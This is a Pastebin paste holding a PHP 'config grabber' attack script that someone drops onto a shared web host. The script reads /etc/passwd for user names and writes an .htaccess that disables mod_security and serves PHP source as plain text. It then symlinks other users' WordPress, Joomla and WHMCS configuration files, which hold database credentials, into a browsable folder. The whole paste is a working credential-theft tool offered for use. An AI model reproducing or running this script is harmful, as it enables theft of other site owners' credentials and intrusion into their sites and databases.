Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <title>.: SIMPLE CONFIG GRABBER :.</title><body bgcolor=black><center><img src=http://azzat.wap.mu/files/1049320/assassin_s_creed_iv_black_flag.png><br><br><i><b><h1><font color=red>HELLCOME</font></h1><br><br><font color=lime>AUTHOR : </font><a href=mailto:[email protected]>AZZATSSINS CYBERSERKERS</a></b></i><br>============<br><form method=post>
- <textarea type=hidden rows=10 cols=30 name=user><?php $users=file("/etc/passwd");
- foreach($users as $user)
- {
- $str=explode(":",$user);
- echo $str[0]."\n";
- }
- ?></textarea><br><br>
- <input type=submit name=su value=" GRAB "></form>
- </center><?php
- /*AUTHOR : AZZATSSINS CYBERSERKERS | BN-IDBTE4M */
- if(isset($_POST['su']))
- {
- mkdir('x',0777);
- $r = " # Config Symlink By AZZATSSINS \nOptions Indexes FollowSymLinks \nForceType text/plain \nAddType text/plain .php \nAddType text/plain .html \nAddType text/html .shtml \nAddType txt .php \nAddHandler server-parsed .php \nAddHandler server-parsed .shtml \nAddHandler txt .php \nAddHandler txt .html \nAddHandler txt .shtml \nOptions All \n<IfModule mod_security.c> \nSecFilterEngine Off \nSecFilterScanPOST Off \nSecFilterCheckURLEncoding Off \nSecFilterCheckCookieFormat Off \nSecFilterCheckUnicodeEncoding Off \nSecFilterNormalizeCookies Off \n</IfModule>";
- $f = fopen('x/.htaccess','w');
- fwrite($f,$r);
- echo "<br><center><b><i><a href=x>CECK INI HERE</a></i></b></center>";
- $usr=explode("\n",$_POST['user']);
- foreach($usr as $uss)
- {
- $us=trim($uss);
- $r="x/";
- symlink('/home/'.$us.'/public_html/wp-config.php',$r.$us.'..wp-config');
- symlink('/home/'.$us.'/public_html/configuration.php',$r.$us.'..joomla-or-whmcs');symlink('/home/'.$us.'/public_html/blog/wp-config.php',$r.$us.'..wp-config');
- symlink('/home/'.$us.'/public_html/blog/configuration.php',$r.$us.'..joomla');symlink('/home/'.$us.'/public_html/wp/wp-config.php',$r.$us.'..wp-config');
- symlink('/home/'.$us.'/public_html/wordpress/wp-congig.php',$r.$us.'..wordpress');symlink('/home/'.$us.'/public_html/config.php',$r.$us.'..config');
- symlink('/home/'.$us.'/public_html/whmcs/configuration.php',$r.$us.'..whmcs');
- symlink('/home/'.$us.'/public_html/support/configuration.php',$r.$us.'..supporwhmcs');
- symlink('/home/'.$us.'/public_html/secure/configuration.php',$r.$us.'..securewhmcs');
- symlink('/home/'.$us.'/public_html/clients/configuration.php',$r.$us.'..whmcs-clients');
- symlink('/home/'.$us.'/public_html/client/configuration.php',$r.$us.'..whmcs-client');
- symlink('/home/'.$us.'/public_html/billing/configuration.php',$r.$us.'..whmcs-billing');
- symlink('/home/'.$us.'/public_html/admin/config.php',$r.$us.'..admin-config');
- echo'<meta http-equiv="Refresh" content= "0; url=x">';}}?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement